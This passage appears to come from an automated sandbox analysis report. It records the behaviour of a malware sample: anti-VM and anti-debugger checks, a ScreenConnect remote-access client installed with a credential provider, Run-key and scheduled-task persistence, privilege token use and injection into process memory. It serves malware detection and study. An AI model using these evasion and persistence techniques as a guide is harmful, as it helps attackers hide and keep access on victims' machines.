Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 8ZVMneG.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | UZAj8wc.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 08d1669db1.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cf68e84021.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | file.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | rundll32.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 8904b059d8.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | taskkill.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | MsiExec.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | powershell.exe
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 4 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid | Process
3608 | powershell.exe
10584 | PING.EXE
5148 | powershell.exe
5436 | PING.EXE
Checks processor information in registry 2 TTPs 8 IoCs
Processor information is often read in order to detect sandboxing environments.
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | firefox.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | firefox.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel | firefox.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | firefox.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | firefox.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | ScreenConnect.WindowsClient.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | ScreenConnect.WindowsClient.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | firefox.exe
Enumerates system info in registry 2 TTPs 2 IoCs
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | ScreenConnect.WindowsClient.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | ScreenConnect.WindowsClient.exe
Kills process with taskkill 5 IoCs
pid | Process
2688 | taskkill.exe
1720 | taskkill.exe
3172 | taskkill.exe
4476 | taskkill.exe
2440 | taskkill.exe
Modifies data under HKEY_USERS 52 IoCs
description | ioc | Process
Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E | msiexec.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs | DrvInst.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs | DrvInst.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates | DrvInst.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | DrvInst.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs | DrvInst.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | DrvInst.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates | DrvInst.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2E | msiexec.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | DrvInst.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs | DrvInst.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs | DrvInst.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs | DrvInst.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | ScreenConnect.WindowsClient.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates | DrvInst.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs | DrvInst.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | DrvInst.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs | DrvInst.exe
Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | DrvInst.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates | DrvInst.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates | DrvInst.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | DrvInst.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs | DrvInst.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | ScreenConnect.ClientService.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | DrvInst.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | DrvInst.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs | DrvInst.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | DrvInst.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | DrvInst.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | DrvInst.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | DrvInst.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs | DrvInst.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs | DrvInst.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | DrvInst.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" | ScreenConnect.WindowsClient.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates | DrvInst.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | DrvInst.exe
Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D | msiexec.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" | ScreenConnect.WindowsClient.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My | DrvInst.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs | DrvInst.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates | DrvInst.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs | DrvInst.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" | ScreenConnect.ClientService.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" | ScreenConnect.ClientService.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | DrvInst.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | DrvInst.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates | DrvInst.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs | DrvInst.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs | DrvInst.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | DrvInst.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | DrvInst.exe
Modifies registry class 38 IoCs
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\AdvertiseFlags = "388" | msiexec.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\SourceList | msiexec.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\SourceList\Media\1 = ";" | msiexec.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-98a59bd0eed9222b\URL Protocol | msiexec.exe
Key created | \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-03BC-F8663411820C} | msiexec.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\D32D1EE57AD9200EF07A7D4C08AB00DC | msiexec.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\E2D8991B85D0C9C3895AB90DEE9D22B2 | msiexec.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-98a59bd0eed9222b | msiexec.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-98a59bd0eed9222b\shell\open | msiexec.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-03BC-F8663411820C}\InprocServer32\ = "C:\\Program Files (x86)\\ScreenConnect Client (98a59bd0eed9222b)\\ScreenConnect.WindowsCredentialProvider.dll" | msiexec.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\D32D1EE57AD9200EF07A7D4C08AB00DC\Full | msiexec.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\ProductIcon = "C:\\Windows\\Installer\\{5EE1D23D-9DA7-E002-0FA7-D7C480BA00CD}\\DefaultIcon" | msiexec.exe
Key created | \REGISTRY\MACHINE\Software\Classes\sc-98a59bd0eed9222b\shell\open\command | msiexec.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-98a59bd0eed9222b\shell\open\command\ = "\"C:\\Program Files (x86)\\ScreenConnect Client (98a59bd0eed9222b)\\ScreenConnect.WindowsClient.exe\" \"%1\"" | msiexec.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\DeploymentFlags = "3" | msiexec.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\SourceList\Net | msiexec.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\Clients = 3a0000000000 | msiexec.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.3.7.9067\\98a59bd0eed9222b\\" | msiexec.exe
Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_Classes\Local Settings | firefox.exe
Key created | \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-03BC-F8663411820C}\InprocServer32 | msiexec.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-03BC-F8663411820C}\InprocServer32\ThreadingModel = "Apartment" | msiexec.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\ProductName = "ScreenConnect Client (98a59bd0eed9222b)" | msiexec.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\PackageCode = "D32D1EE57AD9200EF07A7D4C08AB00DC" | msiexec.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\InstanceType = "0" | msiexec.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-98a59bd0eed9222b\UseOriginalUrlEncoding = "1" | msiexec.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\Assignment = "1" | msiexec.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\AuthorizedLUAApp = "0" | msiexec.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\SourceList\PackageName = "ScreenConnect.ClientSetup.msi" | msiexec.exe
Key created | \REGISTRY\MACHINE\Software\Classes\sc-98a59bd0eed9222b | msiexec.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-98a59bd0eed9222b\shell | msiexec.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-03BC-F8663411820C}\ = "ScreenConnect Client (98a59bd0eed9222b) Credential Provider" | msiexec.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\Version = "402849799" | msiexec.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\E2D8991B85D0C9C3895AB90DEE9D22B2\D32D1EE57AD9200EF07A7D4C08AB00DC | msiexec.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-98a59bd0eed9222b\shell\open\command | msiexec.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC | msiexec.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\Language = "1033" | msiexec.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\SourceList\Media | msiexec.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D32D1EE57AD9200EF07A7D4C08AB00DC\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.3.7.9067\\98a59bd0eed9222b\\" | msiexec.exe
description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 | 02d487f7c7.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob | 02d487f7c7.exe
Runs ping.exe 1 TTPs 2 IoCs
pid | Process
10584 | PING.EXE
5436 | PING.EXE
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | Process
3592 | schtasks.exe
Suspicious behavior: EnumeratesProcesses 53 IoCs
pid | Process
3036 | file.exe
2676 | skotes.exe
2992 | NN9Dd7c.exe
2056 | powershell.exe
1524 | powershell.exe
2980 | UZAj8wc.exe
2980 | UZAj8wc.exe
2980 | UZAj8wc.exe
580 | msiexec.exe
580 | msiexec.exe
3280 | 02d487f7c7.exe
2984 | ScreenConnect.ClientService.exe
2984 | ScreenConnect.ClientService.exe
2984 | ScreenConnect.ClientService.exe
2984 | ScreenConnect.ClientService.exe
2984 | ScreenConnect.ClientService.exe
2984 | ScreenConnect.ClientService.exe
4996 | powershell.exe
5260 | 08d1669db1.exe
2980 | UZAj8wc.exe
5840 | a1740268cc.exe
5840 | a1740268cc.exe
5840 | a1740268cc.exe
5840 | a1740268cc.exe
5840 | a1740268cc.exe
6452 | 36e225cffd.exe
6692 | powershell.exe
680 | powershell.exe
4688 | 77ce657d01.exe
4688 | 77ce657d01.exe
10348 | 02e4c18c72.exe
3548 | 77ce657d01.exe
3548 | 77ce657d01.exe
3608 | powershell.exe
10348 | 02e4c18c72.exe
10348 | 02e4c18c72.exe
10348 | 02e4c18c72.exe
10348 | 02e4c18c72.exe
10348 | 02e4c18c72.exe
10800 | 8d2b699a41.exe
3756 | eb73c920fa.exe
3744 | powershell.exe
5356 | powershell.exe
6204 | 530b5596f6.exe
2112 | cf68e84021.exe
7128 | 5fd6925fa4.exe
3804 | cd12090932.exe
7128 | 5fd6925fa4.exe
7128 | 5fd6925fa4.exe
3804 | cd12090932.exe
3804 | cd12090932.exe
10068 | Intel_PTT_EK_Recertification.exe
5148 | powershell.exe
Suspicious use of AdjustPrivilegeToken 64 IoCs
description | pid | Process
Token: SeDebugPrivilege | 2992 | NN9Dd7c.exe
Token: SeDebugPrivilege | 2056 | powershell.exe
Token: SeDebugPrivilege | 1524 | powershell.exe
Token: SeDebugPrivilege | 680 | ga70pjP.exe
Token: SeShutdownPrivilege | 2304 | msiexec.exe
Token: SeIncreaseQuotaPrivilege | 2304 | msiexec.exe
Token: SeRestorePrivilege | 580 | msiexec.exe
Token: SeTakeOwnershipPrivilege | 580 | msiexec.exe
Token: SeSecurityPrivilege | 580 | msiexec.exe
Token: SeCreateTokenPrivilege | 2304 | msiexec.exe
Token: SeAssignPrimaryTokenPrivilege | 2304 | msiexec.exe
Token: SeLockMemoryPrivilege | 2304 | msiexec.exe
Token: SeIncreaseQuotaPrivilege | 2304 | msiexec.exe
Token: SeMachineAccountPrivilege | 2304 | msiexec.exe
Token: SeTcbPrivilege | 2304 | msiexec.exe
Token: SeSecurityPrivilege | 2304 | msiexec.exe
Token: SeTakeOwnershipPrivilege | 2304 | msiexec.exe
Token: SeLoadDriverPrivilege | 2304 | msiexec.exe
Token: SeSystemProfilePrivilege | 2304 | msiexec.exe
Token: SeSystemtimePrivilege | 2304 | msiexec.exe
Token: SeProfSingleProcessPrivilege | 2304 | msiexec.exe
Token: SeIncBasePriorityPrivilege | 2304 | msiexec.exe
Token: SeCreatePagefilePrivilege | 2304 | msiexec.exe
Token: SeCreatePermanentPrivilege | 2304 | msiexec.exe
Token: SeBackupPrivilege | 2304 | msiexec.exe
Token: SeRestorePrivilege | 2304 | msiexec.exe
Token: SeShutdownPrivilege | 2304 | msiexec.exe
Token: SeDebugPrivilege | 2304 | msiexec.exe
Token: SeAuditPrivilege | 2304 | msiexec.exe
Token: SeSystemEnvironmentPrivilege | 2304 | msiexec.exe
Token: SeChangeNotifyPrivilege | 2304 | msiexec.exe
Token: SeRemoteShutdownPrivilege | 2304 | msiexec.exe
Token: SeUndockPrivilege | 2304 | msiexec.exe
Token: SeSyncAgentPrivilege | 2304 | msiexec.exe
Token: SeEnableDelegationPrivilege | 2304 | msiexec.exe
Token: SeManageVolumePrivilege | 2304 | msiexec.exe
Token: SeImpersonatePrivilege | 2304 | msiexec.exe
Token: SeCreateGlobalPrivilege | 2304 | msiexec.exe
Token: SeCreateTokenPrivilege | 2304 | msiexec.exe
Token: SeAssignPrimaryTokenPrivilege | 2304 | msiexec.exe
Token: SeLockMemoryPrivilege | 2304 | msiexec.exe
Token: SeIncreaseQuotaPrivilege | 2304 | msiexec.exe
Token: SeMachineAccountPrivilege | 2304 | msiexec.exe
Token: SeTcbPrivilege | 2304 | msiexec.exe
Token: SeSecurityPrivilege | 2304 | msiexec.exe
Token: SeTakeOwnershipPrivilege | 2304 | msiexec.exe
Token: SeLoadDriverPrivilege | 2304 | msiexec.exe
Token: SeSystemProfilePrivilege | 2304 | msiexec.exe
Token: SeSystemtimePrivilege | 2304 | msiexec.exe
Token: SeProfSingleProcessPrivilege | 2304 | msiexec.exe
Token: SeIncBasePriorityPrivilege | 2304 | msiexec.exe
Token: SeCreatePagefilePrivilege | 2304 | msiexec.exe
Token: SeCreatePermanentPrivilege | 2304 | msiexec.exe
Token: SeBackupPrivilege | 2304 | msiexec.exe
Token: SeRestorePrivilege | 2304 | msiexec.exe
Token: SeShutdownPrivilege | 2304 | msiexec.exe
Token: SeDebugPrivilege | 2304 | msiexec.exe
Token: SeAuditPrivilege | 2304 | msiexec.exe
Token: SeSystemEnvironmentPrivilege | 2304 | msiexec.exe
Token: SeChangeNotifyPrivilege | 2304 | msiexec.exe
Token: SeRemoteShutdownPrivilege | 2304 | msiexec.exe
Token: SeUndockPrivilege | 2304 | msiexec.exe
Token: SeSyncAgentPrivilege | 2304 | msiexec.exe
Token: SeEnableDelegationPrivilege | 2304 | msiexec.exe
Suspicious use of FindShellTrayWindow 17 IoCs
pid | Process
3036 | file.exe
2304 | msiexec.exe
2304 | msiexec.exe
7128 | 5fd6925fa4.exe
7128 | 5fd6925fa4.exe
7128 | 5fd6925fa4.exe
7128 | 5fd6925fa4.exe
7128 | 5fd6925fa4.exe
7128 | 5fd6925fa4.exe
7128 | 5fd6925fa4.exe
2140 | firefox.exe
2140 | firefox.exe
7128 | 5fd6925fa4.exe
2140 | firefox.exe
2140 | firefox.exe
7128 | 5fd6925fa4.exe
7128 | 5fd6925fa4.exe
Suspicious use of SendNotifyMessage 13 IoCs
pid | Process
7128 | 5fd6925fa4.exe
7128 | 5fd6925fa4.exe
7128 | 5fd6925fa4.exe
7128 | 5fd6925fa4.exe
7128 | 5fd6925fa4.exe
7128 | 5fd6925fa4.exe
7128 | 5fd6925fa4.exe
2140 | firefox.exe
2140 | firefox.exe
7128 | 5fd6925fa4.exe
2140 | firefox.exe
7128 | 5fd6925fa4.exe
7128 | 5fd6925fa4.exe
Suspicious use of WriteProcessMemory 64 IoCs
description | pid | Process | procid_target
PID 3036 wrote to memory of 2676 | 3036 | file.exe | 30
PID 3036 wrote to memory of 2676 | 3036 | file.exe | 30
PID 3036 wrote to memory of 2676 | 3036 | file.exe | 30
PID 3036 wrote to memory of 2676 | 3036 | file.exe | 30
PID 2676 wrote to memory of 2992 | 2676 | skotes.exe | 31
PID 2676 wrote to memory of 2992 | 2676 | skotes.exe | 31
PID 2676 wrote to memory of 2992 | 2676 | skotes.exe | 31
PID 2676 wrote to memory of 2992 | 2676 | skotes.exe | 31
PID 2992 wrote to memory of 2056 | 2992 | NN9Dd7c.exe | 34
PID 2992 wrote to memory of 2056 | 2992 | NN9Dd7c.exe | 34
PID 2992 wrote to memory of 2056 | 2992 | NN9Dd7c.exe | 34
PID 2992 wrote to memory of 2056 | 2992 | NN9Dd7c.exe | 34
PID 2992 wrote to memory of 1524 | 2992 | NN9Dd7c.exe | 36
PID 2992 wrote to memory of 1524 | 2992 | NN9Dd7c.exe | 36
PID 2992 wrote to memory of 1524 | 2992 | NN9Dd7c.exe | 36
PID 2992 wrote to memory of 1524 | 2992 | NN9Dd7c.exe | 36
PID 2676 wrote to memory of 680 | 2676 | skotes.exe | 38
PID 2676 wrote to memory of 680 | 2676 | skotes.exe | 38
PID 2676 wrote to memory of 680 | 2676 | skotes.exe | 38
PID 2676 wrote to memory of 680 | 2676 | skotes.exe | 38
PID 680 wrote to memory of 2304 | 680 | ga70pjP.exe | 39
PID 680 wrote to memory of 2304 | 680 | ga70pjP.exe | 39
PID 680 wrote to memory of 2304 | 680 | ga70pjP.exe | 39
PID 680 wrote to memory of 2304 | 680 | ga70pjP.exe | 39
PID 680 wrote to memory of 2304 | 680 | ga70pjP.exe | 39
PID 680 wrote to memory of 2304 | 680 | ga70pjP.exe | 39
PID 680 wrote to memory of 2304 | 680 | ga70pjP.exe | 39
PID 580 wrote to memory of 376 | 580 | msiexec.exe | 41
PID 580 wrote to memory of 376 | 580 | msiexec.exe | 41
PID 580 wrote to memory of 376 | 580 | msiexec.exe | 41
PID 580 wrote to memory of 376 | 580 | msiexec.exe | 41
PID 580 wrote to memory of 376 | 580 | msiexec.exe | 41
PID 580 wrote to memory of 376 | 580 | msiexec.exe | 41
PID 580 wrote to memory of 376 | 580 | msiexec.exe | 41
PID 376 wrote to memory of 640 | 376 | MsiExec.exe | 42
PID 376 wrote to memory of 640 | 376 | MsiExec.exe | 42
PID 376 wrote to memory of 640 | 376 | MsiExec.exe | 42
PID 376 wrote to memory of 640 | 376 | MsiExec.exe | 42
PID 376 wrote to memory of 640 | 376 | MsiExec.exe | 42
PID 376 wrote to memory of 640 | 376 | MsiExec.exe | 42
PID 376 wrote to memory of 640 | 376 | MsiExec.exe | 42
PID 2676 wrote to memory of 1940 | 2676 | skotes.exe | 45
PID 2676 wrote to memory of 1940 | 2676 | skotes.exe | 45
PID 2676 wrote to memory of 1940 | 2676 | skotes.exe | 45
PID 2676 wrote to memory of 1940 | 2676 | skotes.exe | 45
PID 2676 wrote to memory of 1940 | 2676 | skotes.exe | 45
PID 2676 wrote to memory of 1940 | 2676 | skotes.exe | 45
PID 2676 wrote to memory of 1940 | 2676 | skotes.exe | 45
PID 2676 wrote to memory of 1728 | 2676 | skotes.exe | 46
PID 2676 wrote to memory of 1728 | 2676 | skotes.exe | 46
PID 2676 wrote to memory of 1728 | 2676 | skotes.exe | 46
PID 2676 wrote to memory of 1728 | 2676 | skotes.exe | 46
PID 1728 wrote to memory of 2752 | 1728 | 8ZVMneG.exe | 48
PID 1728 wrote to memory of 2752 | 1728 | 8ZVMneG.exe | 48
PID 1728 wrote to memory of 2752 | 1728 | 8ZVMneG.exe | 48
PID 1728 wrote to memory of 2752 | 1728 | 8ZVMneG.exe | 48
PID 1728 wrote to memory of 2752 | 1728 | 8ZVMneG.exe | 48
PID 1728 wrote to memory of 2752 | 1728 | 8ZVMneG.exe | 48
PID 1728 wrote to memory of 2752 | 1728 | 8ZVMneG.exe | 48
PID 1728 wrote to memory of 2752 | 1728 | 8ZVMneG.exe | 48
PID 1728 wrote to memory of 2752 | 1728 | 8ZVMneG.exe | 48
PID 1728 wrote to memory of 2752 | 1728 | 8ZVMneG.exe | 48
PID 2676 wrote to memory of 2980 | 2676 | skotes.exe | 50
PID 2676 wrote to memory of 2980 | 2676 | skotes.exe | 50
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Views/modifies file attributes 1 TTPs 3 IoCs
pid | Process
3576 | attrib.exe
3560 | attrib.exe
3516 | attrib.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1196
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3036 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2676 -
C:\Users\Admin\AppData\Local\Temp\1017666001\NN9Dd7c.exe"C:\Users\Admin\AppData\Local\Temp\1017666001\NN9Dd7c.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2992 -
